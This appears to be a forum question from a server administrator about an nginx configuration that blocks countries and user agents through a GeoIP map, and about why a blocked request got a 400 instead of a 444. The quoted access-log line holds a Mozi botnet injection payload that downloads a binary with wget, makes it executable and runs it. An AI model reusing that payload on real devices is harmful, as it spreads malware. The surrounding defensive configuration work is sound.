Nginx: implementing country block with a map

I am trying to implement, on a nginx webserver, a country block with a map.

This is my server configuration:

include snippets/ban-country-codes.conf;
include snippets/ban-user-agent.conf;

server {
        listen 80 default_server;
        server_name _;

        # Disallow access based on GeoIP
        if ($allowed_country = no) {
           return 444;
           }

        # Disallow access based on user agent
        if ($allowed_useragent = no) {
           return 444;
           }

        access_log /var/log/nginx/dehydrated80.access.log combinedplusgeoip;
        error_log /var/log/nginx/dehydrated80.error.log;
                location ^~ /.well-known/acme-challenge {
                default_type "text/plain";
                auth_basic "off";
                alias /var/www/dehydrated;
        }

        #redirect all other urls to https
        location / {
                return 301 https://$host$request_uri;
        }

}

and this is the snippet that implements the ban (snippets/ban-country-codes.conf):

map $geoip_country_code3 $allowed_country {
    '' no;
    CHN no;
    default yes;
}

In theory nginx should return 444 (close the connection) for clients from CHN and clients with no geo identification.

Unfortunately i see this in my log (custom format combinedplusgeoip, a combined format in which i added the geoip information):

<ipaddress> CHN - - [14/Oct/2020:11:02:37 +0200] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 166 "-" "-"

The server responds with a 400 (of course, it’s a malicious request) instead with an expected 444.

How is it possible?